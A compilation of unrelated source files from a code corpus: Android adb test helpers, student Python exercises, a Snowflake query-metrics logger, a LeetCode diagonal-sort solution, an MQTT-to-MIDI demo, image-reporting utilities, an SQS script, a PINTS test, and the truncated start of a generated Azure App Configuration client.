"""安装外部应用|安装多个外部应用"""
try:
apksp = '../testcases/setup/apks/'
apks = commands.getoutput("ls %s" %apksp).split('\n')
for apk in apks:
os.system("adb -s %s install %s/%s" %(self.id, apksp, apk))
except Exception, e :
self.a.log.debug("", "\n testInstallApks")
self.fail("Error happened: %s %s" % ( self.error, e))
def launchLetv(self):
for i in range(3):
self.a.input.home()
time.sleep(5)
self.a.input.back(2)
time.sleep(2)
for i in range(5):
if 'com.letv.signalsourcemanager/com.letv.signalsourcemanager.MainActivity' not in str(self.a.ui.window()):
self.a.input.home()
time.sleep(2)
self.a.input.left()
time.sleep(1)
self.a.input.center()
else:
break
self.a.input.home()
time.sleep(2)
self.a.input.right(2)
self.a.input.center()
def isOK(self):
try:
widgets = self.a.ui.waitfor(
anyof=[
self.a.ui.widgetspec(id='message'),
self.a.ui.widgetspec(text='Wait')])
if widgets == 'message':
self.a.input.down()
self.a.input.center()
self.error = "Force Closed"
return False
if widgets == 'Wait':
self.a.input.down()
self.a.input.right()
self.a.input.center()
self.error = "ANR Happened"
return False
"""if widgets == idname:
self.error="Exit Without any prompt message"
return False"""
self.a.log.debug("", "No Force Closed & ANR happen!")
if 'Application Error' in str(self.a.ui.windows()):
self.a.input.right()
self.a.input.center()
return False
return True
except:
return True
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| [
"[email protected]"
] | |
68fbfc30ae113b14e8e307ec4775137c6e47de5d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/97/usersdata/206/56394/submittedfiles/lecker.py | 6a4f92871ebc5f5c9f874df4bd40bc0b6ea4393a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 956 | py | # -*- coding: utf-8 -*-
n= int(input('Digite N:'))
a=[]
b=[]
contA=0
contB=0
for z in range (1, n+1,1):
valorA=float(input('valor da lista A:'))
a.append(valorA)
for i in range (0, len(a),1):
if(i==0):
if (a[i]>a[i-1]):
contA=contA + 1
elif (i==len(a)- 1):
if (a[i]>a[i-1]):
contA=contA + 1
else:
if(a[i]>a[i+1] and a[i]>a[i-1]):
contA=contA + 1
for z in range (1, n+1, 1):
valorB=float(input('Valor da lista B:'))
b.append(valorB)
for i in range (0, len(b), 1):
if(i==0):
if (b[i]>b [i+1]):
contB=contB+1
elif(i==len(b)-1):
if(b[i]>b[i-1]):
contB=contB+1
else:
if(b[i]>b[i+1] and b[i]>b{i-1]):
contB=contB+1
if(contA==1):
print('S')
else:
prin('N')
if(contB==1):
print('S')
else:
print('N')
| [
"[email protected]"
] | |
726e3445787acda675e18981a98aa2e53e15c3ab | 8de847f626ffb6b11e49bec669cb80304a66a0af | /plugins/dbnd-snowflake/src/dbnd_snowflake/snowflake_resources.py | 0a37250ef330c5add20ed3cf14ca8b0387d6b7b7 | [
"Apache-2.0"
] | permissive | FHoffmannCode/dbnd | 5ac7d766ec1bfe37f7a12605ebd12b4dcf31fba6 | 82beee1a8c752235bf21b4b0ceace5ab25410e52 | refs/heads/master | 2022-12-26T06:04:30.008949 | 2020-10-04T19:30:58 | 2020-10-04T19:30:58 | 301,370,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,981 | py | import logging
from decimal import Decimal
from textwrap import dedent
from dbnd import log_duration, log_metrics
from dbnd_snowflake.snowflake_values import SnowflakeController
logger = logging.getLogger(__name__)
# TODO: Add support for QUERY_TAG
# I.e. Subclass SnowflakeOperator and set session param QUERY_TAG to "dbnd.{dag/task_name/task_id}"
# Then use pass this QUERY_TAG to UI for easier navigation between
# See https://community.snowflake.com/s/article/How-We-Controlled-and-Reduced-Snowflake-Compute-Cost
# https://github.com/snowflakedb/snowflake-connector-python/issues/203
def log_snowflake_resource_usage(
query_text, database, user, connection_string, session_id=None
):
"""
get and log cpu time, run time, disk read, and processed rows.
connection or connection_string is required. supports only psycopg2 connections.
"""
try:
with log_duration("log_snowflake_resource_usage__time_seconds", "system"):
_log_snowflake_resource_usage(
query_text, database, user, connection_string, session_id
)
except Exception as exc:
conn_without_pass = _censor_password(connection_string)
logger.exception(
"Failed to log_redshift_resource_usage (query_text=%s, connection_string=%s)",
query_text,
conn_without_pass,
)
def _log_snowflake_resource_usage(
query_text, database, user, connection_string, session_id=None,
):
# Quick and dirty way to handle optional clause element.
# Might be better to use SQLAlchemy expression language here
if session_id:
query_history = dedent(
"""\
select *
from table({}.information_schema.query_history(dateadd('minutes',-15,current_timestamp()),current_timestamp()))
where LOWER(query_text)=LOWER(%s) and LOWER(user_name)=LOWER(%s) and session_id=%s
order by start_time desc limit 1;"""
).format(database, session_id)
query_params = (query_text, user, session_id)
else:
query_history = dedent(
"""\
select *
from table({}.information_schema.query_history(dateadd('minutes',-15,current_timestamp()),current_timestamp()))
where LOWER(query_text)=LOWER(%s) and LOWER(user_name)=LOWER(%s)
order by start_time desc limit 1;"""
).format(database)
query_params = (query_text, user)
result = _connect_and_query(connection_string, query_history, *query_params)
if not result:
logger.info(
"resource metrics were not found for query '%s', query_params=%s",
query_text,
query_params,
)
log_metrics(
{
"snowflake_query_warning": "No resources info found",
"snowflake_query_text": query_text,
},
source="system",
)
return
metrics = result[0]
key = "snowflake_query_{}".format(
metrics["QUERY_TAG"] if metrics["QUERY_TAG"] else metrics["QUERY_ID"]
)
snowflake_metric_to_ui_name = {
"BYTES_SCANNED": "bytes_scanned",
"COMPILATION_TIME": "compilation_time_milliseconds",
"CREDITS_USED_CLOUD_SERVICES": "credits_used_cloud_services",
"EXECUTION_TIME": "execution_time_milliseconds",
"QUERY_TEXT": "query_text",
"ROWS_PRODUCED": "rows_produced",
"TOTAL_ELAPSED_TIME": "total_elapsed_time_milliseconds",
}
metrics_to_log = {}
for metric, ui_name in snowflake_metric_to_ui_name.items():
if metric in metrics:
value = metrics[metric]
# Quick hack to track decimal values. probably should be handled on a serialization level
if isinstance(value, Decimal):
value = float(value)
metrics_to_log[key + "." + ui_name] = value
log_metrics(metrics_to_log, source="system")
def _connect_and_query(connection_string, query, *params):
""" connect if needed, then query. """
# if (connection is None) and (connection_string is None):
if connection_string is None:
logger.error(
"connection and connection string are None, one of them is required to query redshift"
)
return
with SnowflakeController(connection_string) as snowflake:
return snowflake._query(query, params)
def _censor_password(connection_string):
"""
example connection string:
postgres://user:[email protected]:5439/dev
returns:
postgres://user:*****@host.com:5439/dev
"""
if (not connection_string) or ("@" not in connection_string):
return connection_string
split1 = connection_string.split("@")
split2 = split1[0].split(":")
if len(split2) != 3:
return connection_string
split2[-1] = "*****"
split2_join = ":".join(split2)
split1[0] = split2_join
split1_join = "@".join(split1)
return split1_join
| [
"[email protected]"
] | |
0b2ee115102da0dff844ffdbfff0f1445e2b6017 | 66fe6eb64afeb7313a4c7685a8748455325b6726 | /1329-sort-the-matrix-diagonally.py | b944795e759d4d78649c943f42f1017f27392e8e | [] | no_license | anantkaushik/leetcode | b54eb27b17ed95b02ab426392208c346f2d87aaa | 06f0a6dbff2e2062fa4568efa5f01ad982d6ac94 | refs/heads/master | 2022-03-07T18:21:35.881943 | 2022-02-23T12:27:24 | 2022-02-23T12:27:24 | 120,501,367 | 40 | 13 | null | 2019-10-11T11:07:22 | 2018-02-06T18:05:51 | Python | UTF-8 | Python | false | false | 1,243 | py | """
Problem Link: https://leetcode.com/problems/sort-the-matrix-diagonally/
A matrix diagonal is a diagonal line of cells starting from some cell in either the topmost row or leftmost column and
going in the bottom-right direction until reaching the matrix's end. For example, the matrix diagonal starting from mat[2][0],
where mat is a 6 x 3 matrix, includes cells mat[2][0], mat[3][1], and mat[4][2].
Given an m x n matrix mat of integers, sort each matrix diagonal in ascending order and return the resulting matrix.
Example 1:
Input: mat = [[3,3,1,1],[2,2,1,2],[1,1,1,2]]
Output: [[1,1,1,1],[1,2,2,2],[1,2,3,3]]
Constraints:
m == mat.length
n == mat[i].length
1 <= m, n <= 100
1 <= mat[i][j] <= 100
"""
class Solution:
def diagonalSort(self, mat: List[List[int]]) -> List[List[int]]:
diagnoals = collections.defaultdict(list)
for i, row in enumerate(mat):
for j, val in enumerate(row):
diagnoals[i-j].append(val)
for d in diagnoals.values():
d.sort(reverse=True)
for i, row in enumerate(mat):
for j, _ in enumerate(row):
mat[i][j] = diagnoals[i-j].pop()
return mat
| [
"[email protected]"
] | |
d68c5d463664d4d7bdbf0dbcda90e172df77d16f | 40218b64840f4eec1866e33300a8395bdfa4c33b | /demos/TestMQTTMusic.py | 456f3f1fd42dc664ca03a96ca51e57e63ea91846 | [
"MIT"
] | permissive | titos-carrasco/MindSet-Python | af0750ec12a72954741f13ff016e9a4d9e753b08 | 74f53fe49b8b6129a7a34da314efc46d3d5e1aa1 | refs/heads/master | 2021-12-24T16:41:43.766347 | 2021-12-24T00:02:34 | 2021-12-24T00:02:34 | 98,101,141 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,000 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import rtmidi
import paho.mqtt.client as mqtt
import json
import time
import queue
from mindset.MindSet import *
MQTT_SERVER = '127.0.0.1'
MQTT_PORT = 1883
MQTT_TOPIC = "rcr/demo/mindset"
class TestMusicaMQTT():
def __init__( self, mqtt_server, mqtt_port, mqtt_topic ):
self.mqtt_server = mqtt_server
self.mqtt_port = mqtt_port
self.mqtt_topic = mqtt_topic
self.messages = queue.Queue( 1 )
def mqtt_on_connect( self, client, userdata, flags, rc ):
client.subscribe( self.mqtt_topic )
def mqtt_on_message( self, client, userdata, message ):
try:
self.messages.get_nowait()
except:
pass
self.messages.put_nowait( message )
def run( self ):
midiOut = rtmidi.MidiOut()
midiOut.open_virtual_port( 'MindSet Port' )
nota1 = [ 0 ]*4
nota2 = [ 0 ]*4
mqtt_client = mqtt.Client()
mqtt_client.on_connect = self.mqtt_on_connect
mqtt_client.on_message = self.mqtt_on_message
mqtt_client.loop_start()
mqtt_client.connect( self.mqtt_server, self.mqtt_port )
time.sleep( 2 )
while( True ):
msg = self.messages.get()
msd = json.loads( msg.payload )
nota = msd['attentionESense']
midiOut.send_message( [ 0x90, nota,8 ] ) # on channel 0, nota, velocidad
nota1.append( nota )
nota = nota1.pop(0)
midiOut.send_message( [ 0x80, nota, 8 ] ) # off channel 0, nota, velocidad
nota = msd['meditationESense']
midiOut.send_message( [ 0x91, nota, 8 ] ) # on channel 1, nota, velocidad
nota2.append( nota )
nota = nota2.pop(0)
midiOut.send_message( [ 0x81, nota, 8 ] ) # off channel 1, nota, velocidad
if( __name__ == "__main__" ):
TestMusicaMQTT( MQTT_SERVER, MQTT_PORT, MQTT_TOPIC ).run()
| [
"[email protected]"
] | |
f273efbb20a2ff8023b3515a70d85b4edd43fe4e | b60953cdbb29dd87a450d1a1a5f6f5fde6f0e200 | /util/repoter.py | 42db8e3d10e2dbca45c5ed3d6cd6ac2e0cfe670f | [
"MIT"
] | permissive | PINTO0309/TensorflowLite-UNet | bcffad7db93c8ea0d85aea976773fa22fa8bd2bb | e805162fc2623b31dbdbf159d2eb89d7041fdbdd | refs/heads/master | 2020-04-01T20:56:13.269870 | 2019-02-13T11:59:01 | 2019-02-13T11:59:01 | 153,627,668 | 79 | 22 | MIT | 2018-10-19T23:13:56 | 2018-10-18T13:24:10 | Python | UTF-8 | Python | false | false | 6,381 | py | from PIL import Image
import numpy as np
import datetime
import os
import matplotlib.pyplot as plt
class Reporter:
ROOT_DIR = "result"
IMAGE_DIR = "image"
LEARNING_DIR = "learning"
INFO_DIR = "info"
PARAMETER = "parameter.txt"
IMAGE_PREFIX = "epoch_"
IMAGE_EXTENSION = ".png"
def __init__(self, result_dir=None, parser=None):
if result_dir is None:
result_dir = Reporter.generate_dir_name()
self._root_dir = self.ROOT_DIR
self._result_dir = os.path.join(self._root_dir, result_dir)
self._image_dir = os.path.join(self._result_dir, self.IMAGE_DIR)
self._image_train_dir = os.path.join(self._image_dir, "train")
self._image_test_dir = os.path.join(self._image_dir, "test")
self._learning_dir = os.path.join(self._result_dir, self.LEARNING_DIR)
self._info_dir = os.path.join(self._result_dir, self.INFO_DIR)
self._parameter = os.path.join(self._info_dir, self.PARAMETER)
self.create_dirs()
self._matplot_manager = MatPlotManager(self._learning_dir)
if parser is not None:
self.save_params(self._parameter, parser)
@staticmethod
def generate_dir_name():
return datetime.datetime.today().strftime("%Y%m%d_%H%M")
def create_dirs(self):
os.makedirs(self._root_dir, exist_ok=True)
os.makedirs(self._result_dir)
os.makedirs(self._image_dir)
os.makedirs(self._image_train_dir)
os.makedirs(self._image_test_dir)
os.makedirs(self._learning_dir)
os.makedirs(self._info_dir)
@staticmethod
def save_params(filename, parser):
parameters = list()
parameters.append("Number of epochs:" + str(parser.epoch))
parameters.append("Batch size:" + str(parser.batchsize))
parameters.append("Training rate:" + str(parser.trainrate))
parameters.append("Augmentation:" + str(parser.augmentation))
parameters.append("L2 regularization:" + str(parser.l2reg))
output = "\n".join(parameters)
with open(filename, mode='w') as f:
f.write(output)
def save_image(self, train, test, epoch):
file_name = self.IMAGE_PREFIX + str(epoch) + self.IMAGE_EXTENSION
train_filename = os.path.join(self._image_train_dir, file_name)
test_filename = os.path.join(self._image_test_dir, file_name)
train.save(train_filename)
test.save(test_filename)
def save_image_from_ndarray(self, train_set, test_set, palette, epoch, index_void=None):
assert len(train_set) == len(test_set) == 3
train_image = Reporter.get_imageset(train_set[0], train_set[1], train_set[2], palette, index_void)
test_image = Reporter.get_imageset(test_set[0], test_set[1], test_set[2], palette, index_void)
self.save_image(train_image, test_image, epoch)
def create_figure(self, title, xylabels, labels, filename=None):
return self._matplot_manager.add_figure(title, xylabels, labels, filename=filename)
@staticmethod
def concat_images(im1, im2, palette, mode):
if mode == "P":
assert palette is not None
dst = Image.new("P", (im1.width + im2.width, im1.height))
dst.paste(im1, (0, 0))
dst.paste(im2, (im1.width, 0))
dst.putpalette(palette)
elif mode == "RGB":
dst = Image.new("RGB", (im1.width + im2.width, im1.height))
dst.paste(im1, (0, 0))
dst.paste(im2, (im1.width, 0))
return dst
@staticmethod
def cast_to_pil(ndarray, palette, index_void=None):
assert len(ndarray.shape) == 3
res = np.argmax(ndarray, axis=2)
if index_void is not None:
res = np.where(res == index_void, 0, res)
image = Image.fromarray(np.uint8(res), mode="P")
image.putpalette(palette)
return image
@staticmethod
def get_imageset(image_in_np, image_out_np, image_tc_np, palette, index_void=None):
assert image_in_np.shape[:2] == image_out_np.shape[:2] == image_tc_np.shape[:2]
image_out, image_tc = Reporter.cast_to_pil(image_out_np, palette, index_void),\
Reporter.cast_to_pil(image_tc_np, palette, index_void)
image_concated = Reporter.concat_images(image_out, image_tc, palette, "P").convert("RGB")
image_in_pil = Image.fromarray(np.uint8(image_in_np * 255), mode="RGB")
image_result = Reporter.concat_images(image_in_pil, image_concated, None, "RGB")
return image_result
class MatPlotManager:
def __init__(self, root_dir):
self._root_dir = root_dir
self._figures = {}
def add_figure(self, title, xylabels, labels, filename=None):
assert not(title in self._figures.keys()), "This title already exists."
self._figures[title] = MatPlot(title, xylabels, labels, self._root_dir, filename=filename)
return self._figures[title]
def get_figure(self, title):
return self._figures[title]
class MatPlot:
EXTENSION = ".png"
def __init__(self, title, xylabels, labels, root_dir, filename=None):
assert len(labels) > 0 and len(xylabels) == 2
if filename is None:
self._filename = title
else:
self._filename = filename
self._title = title
self._xlabel, self._ylabel = xylabels[0], xylabels[1]
self._labels = labels
self._root_dir = root_dir
self._series = np.zeros((len(labels), 0))
def add(self, series, is_update=False):
series = np.asarray(series).reshape((len(series), 1))
assert series.shape[0] == self._series.shape[0], "series must have same length."
self._series = np.concatenate([self._series, series], axis=1)
if is_update:
self.save()
def save(self):
plt.cla()
for s, l in zip(self._series, self._labels):
plt.plot(s, label=l)
plt.legend()
plt.grid()
plt.xlabel(self._xlabel)
plt.ylabel(self._ylabel)
plt.title(self._title)
plt.savefig(os.path.join(self._root_dir, self._filename+self.EXTENSION))
if __name__ == "__main__":
pass
| [
"[email protected]"
] | |
4a00024163d840eac6bbf878d2c02d6e3dee4993 | fa4d4455159ad2d9e7e057388e2fa45a2333928b | /assignments/Assignment7/Assignment7_3.py | fcf9a62a0d9f5d7b2cb6ab5674836ab5dcbb5aa2 | [] | no_license | shreyash05/python_programs | b492e6fbeba7bc8a31caf72dd60f3984ff16e6f0 | 74b4f3ee15a7221d03816f7ba831d59bec7bf7ff | refs/heads/main | 2023-04-25T11:15:44.868634 | 2021-05-20T12:55:54 | 2021-05-20T12:55:54 | 356,513,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,921 | py | """ 3. Write a program which contains one class named as Numbers.
Arithmetic class contains one instance variables as Value.
Inside init method initialise that instance variables to the value which is accepted from user.
There are four instance methods inside class as ChkPrime(), ChkPerfect(), SumFactors(),
Factors().
ChkPrime() method will returns true if number is prime otherwise return false.
ChkPerfect() method will returns true if number is perfect otherwise return false.
Factors() method will display all factors of instance variable.
SumFactors() method will return addition of all factors. Use this method in any another method
as a helper method if required.
After designing the above class call all instance methods by creating multiple objects. """
class Numbers:
def __init__(self,value):
self.value = value
def ChkPrime(self):
for element in range(2,self.value):
flag = 0
if(self.value%element==0):
flag = 1
break
if flag == 0:
return True
else:
return False
def ChkPerfect(self):
isum = 0
for element in range(1,self.value):
if(self.value%element==0):
isum = isum+element
if isum==self.value:
return True
else:
return False
def Factors(self):
print("Factors of number:")
for element in range(1,self.value):
if(self.value%element==0):
print(element)
def SumFactors(self):
isum = 0
for element in range(1,self.value):
if(self.value%element==0):
isum = isum+element
return isum
def main():
obj = Numbers(6)
ret1 = obj.ChkPrime()
if(ret1==True):
print("Number is prime")
else:
print("Number is not prime")
ret2 = obj.ChkPerfect()
if(ret2==True):
print("Number is perfect")
else:
print("Number is not perfect")
obj.Factors()
ret4 = obj.SumFactors()
print("sum of factors is:",ret4)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
d5d6cc1460ec8a0cc8fa4caad9843cc19a94fca7 | 7b0c90185aa3d4ae7c422ff32fcc0ebf930f1eed | /venv/bin/cq | 181b875f537d28fd7dc87e8b9dd64210bb35b2fc | [] | no_license | skilllauncher/lets-hi5 | d3c83052886027575e5e3b5d4e92cb934105fab5 | 8277d3ea641b44fc70c4bfb1f5581e6ae8e395cb | refs/heads/master | 2020-03-24T03:14:35.276636 | 2018-07-26T08:14:19 | 2018-07-26T08:14:19 | 142,410,670 | 0 | 1 | null | 2018-07-26T08:16:33 | 2018-07-26T08:16:33 | null | UTF-8 | Python | false | false | 3,089 | #!/Users/saicharanreddy/Desktop/lets-hi5/venv/bin/python
# Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import getopt, sys
import boto.sqs
from boto.sqs.connection import SQSConnection
from boto.exception import SQSError
def usage():
print 'cq [-c] [-q queue_name] [-o output_file] [-t timeout] [-r region]'
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], 'hcq:o:t:r:',
['help', 'clear', 'queue=',
'output=', 'timeout=', 'region='])
except:
usage()
sys.exit(2)
queue_name = ''
output_file = ''
timeout = 30
region = ''
clear = False
for o, a in opts:
if o in ('-h', '--help'):
usage()
sys.exit()
if o in ('-q', '--queue'):
queue_name = a
if o in ('-o', '--output'):
output_file = a
if o in ('-c', '--clear'):
clear = True
if o in ('-t', '--timeout'):
timeout = int(a)
if o in ('-r', '--region'):
region = a
if region:
c = boto.sqs.connect_to_region(region)
if c is None:
print 'Invalid region (%s)' % region
sys.exit(1)
else:
c = SQSConnection()
if queue_name:
try:
rs = [c.create_queue(queue_name)]
except SQSError as e:
print 'An Error Occurred:'
print '%s: %s' % (e.status, e.reason)
print e.body
sys.exit()
else:
try:
rs = c.get_all_queues()
except SQSError as e:
print 'An Error Occurred:'
print '%s: %s' % (e.status, e.reason)
print e.body
sys.exit()
for q in rs:
if clear:
n = q.clear()
print 'clearing %d messages from %s' % (n, q.id)
elif output_file:
q.dump(output_file)
else:
print q.id, q.count(vtimeout=timeout)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | ||
50b15ee80d619c141365229c4ac4c5a1f3eab92a | 74f2e26b17acd51f5eaea5df6a3921943ac29d98 | /pints/tests/test_toy_lotka_volterra_model.py | 64e450b7bfbab3ec9d4558042baa600896f97152 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | nandigama/pints | fd1ec6ee7e7a0d5f255f6c94b0da0a3cbb2e9efd | adf920adaf4f9e23f33bb978f79bc0c341acd4eb | refs/heads/master | 2020-07-13T03:13:33.740363 | 2019-08-26T21:15:24 | 2019-08-26T21:15:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,466 | py | #!/usr/bin/env python
#
# Tests if the Lotka-Volterra toy model runs.
#
# This file is part of PINTS.
# Copyright (c) 2017-2018, University of Oxford.
# For licensing information, see the LICENSE file distributed with the PINTS
# software package.
#
import unittest
import numpy as np
import pints
import pints.toy
class TestLotkaVolterraModel(unittest.TestCase):
"""
Tests if the Lotka-Volterra toy model runs.
"""
def test_run(self):
model = pints.toy.LotkaVolterraModel()
self.assertEqual(model.n_parameters(), 4)
self.assertEqual(model.n_outputs(), 2)
times = model.suggested_times()
parameters = model.suggested_parameters()
values = model.simulate(parameters, times)
self.assertEqual(values.shape, (len(times), 2))
self.assertTrue(np.all(values > 0))
# Test setting and getting init cond.
self.assertFalse(np.all(model.initial_conditions() == [10, 10]))
model.set_initial_conditions([10, 10])
self.assertTrue(np.all(model.initial_conditions() == [10, 10]))
# Initial conditions cannot be negative
model = pints.toy.LotkaVolterraModel([0, 0])
self.assertRaises(ValueError, pints.toy.LotkaVolterraModel, [-1, 0])
self.assertRaises(ValueError, pints.toy.LotkaVolterraModel, [0, -1])
self.assertRaises(ValueError, pints.toy.LotkaVolterraModel, [-1, -1])
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
3272b803a4924a147960a0c97b018b92231252ef | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /YK9PpDRfyBTEarNyR_6.py | 336c15964672eb1a583700bbf580e7666e0021f2 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | """
Programmer Pete is trying to turn two lists inside one list into one without
messing the order of the list nor the type and because he's pretty advanced he
made it without blinking but I want you to make it too.
### Examples
one_list([[1, 2], [3, 4]]) ➞ [1, 2, 3, 4]
one_list([["a", "b"], ["c", "d"]]) ➞ ["a", "b", "c", "d"]
one_list([[True, False], [False, False]]) ➞ [True, False, False, False]
### Notes
* Remember to `return` the list.
* Check **Resources** for more info.
"""
def one_list(lst):
return lst[0] + lst[1]
| [
"[email protected]"
] | |
d1cf241890c289ab4628ed9941032718dd9d5a40 | 7ba4e38e0835cd009a078ce39a480b5bacaba21f | /sample_code/chap5/5.1.2.testplot3d.py | d0c8015f395f6ef3c7c84022b96a7c47a74a2256 | [] | no_license | moguranran/computer_vision_test | fe0641987905755c733e4ab16f48c3b76d01b3f4 | 4c5b5572d01e13a42eefb2423e66e34675c305cb | refs/heads/master | 2022-04-20T17:53:37.668609 | 2020-03-31T00:13:02 | 2020-03-31T00:13:02 | 249,196,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from pylab import *
from mpl_toolkits.mplot3d import axes3d
fig = figure()
ax = fig.gca(projection="3d")
# 3Dのサンプルデータを生成する
X,Y,Z = axes3d.get_test_data(0.25)
# 3Dの点を描画する
ax.plot(X.flatten(),Y.flatten(),Z.flatten(),'o')
show()
| [
"[email protected]"
] | |
df09e465e9af07a47772e5ceb87409c30f72a830 | f38e78214992de722a6ec2012e844bce7b3c59ed | /lib/clckwrkbdgr/todo/test/test_providers.py | 04ed6438c490083c1709000f37ae9b135d01877e | [
"MIT"
] | permissive | clckwrkbdgr/dotfiles | 20fb86f54d93ae4936c334898c3d7b1b3820fb06 | a7e880e189bfa4793f30ff928b049e4a182a38cd | refs/heads/master | 2023-08-31T13:13:47.533868 | 2023-08-30T18:32:00 | 2023-08-30T18:32:00 | 20,396,084 | 2 | 2 | MIT | 2022-10-01T16:35:31 | 2014-06-02T07:26:38 | Python | UTF-8 | Python | false | false | 1,153 | py | import json
from ... import xdg
from ... import unittest
from ..provider import todo_dir
from .. import _base
class TestTodoDir(unittest.fs.TestCase):
MODULES = [todo_dir]
def setUp(self):
if _base.task_provider._entries.get('todo_dir'): # pragma: no cover
del _base.task_provider._entries['todo_dir']
super(TestTodoDir, self).setUp()
def tearDown(self):
if _base.task_provider._entries.get('todo_dir'): # pragma: no cover
del _base.task_provider._entries['todo_dir']
@unittest.mock.patch('clckwrkbdgr.todo._base.read_config', new=_base.read_config.__wrapped__)
def should_list_todo_dir(self):
self.fs.create_file(str(xdg.save_data_path('todo')/'config.json'), contents=json.dumps({
"inbox_file" : str(xdg.save_data_path('todo')/"inbox.txt"),
"todo_dir" : str(xdg.save_data_path('todo')),
}))
self.fs.create_dir(str(xdg.save_data_path('todo')/'foo'))
self.fs.create_file(str(xdg.save_data_path('todo')/'bar.md'))
self.fs.create_file(str(xdg.save_data_path('todo')/'inbox.txt'))
self.assertEqual(set(todo_dir.list_todo_directory()), {
_base.Task('foo', tags=['foo']),
_base.Task('bar.md', tags=['bar']),
})
| [
"[email protected]"
] | |
5a8758c70f2c16039e050e3cd7e77ed3736f27e3 | 0a2cc497665f2a14460577f129405f6e4f793791 | /sdk/appconfiguration/azure-appconfiguration/azure/appconfiguration/_generated/aio/operations/_azure_app_configuration_operations.py | d898efd4c7a3d1b42d4ce643dcad171b78bb582f | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | hivyas/azure-sdk-for-python | 112158aa9e1dd6e30cf6b3dde19f5db6ea2a577b | 8b3258fa45f5dc25236c22ad950e48aa4e1c181c | refs/heads/master | 2023-06-17T12:01:26.392186 | 2021-05-18T19:56:01 | 2021-05-18T19:56:01 | 313,761,277 | 1 | 1 | MIT | 2020-12-02T17:48:22 | 2020-11-17T22:42:00 | Python | UTF-8 | Python | false | false | 59,148 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AzureAppConfigurationOperationsMixin:
def get_keys(
self,
name: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
**kwargs
) -> AsyncIterable["_models.KeyListResult"]:
"""Gets a list of keys.
Gets a list of keys.
:param name: A filter for the name of the returned keys.
:type name: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.appconfiguration.models.KeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.keyset+json, application/json, application/problem+json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
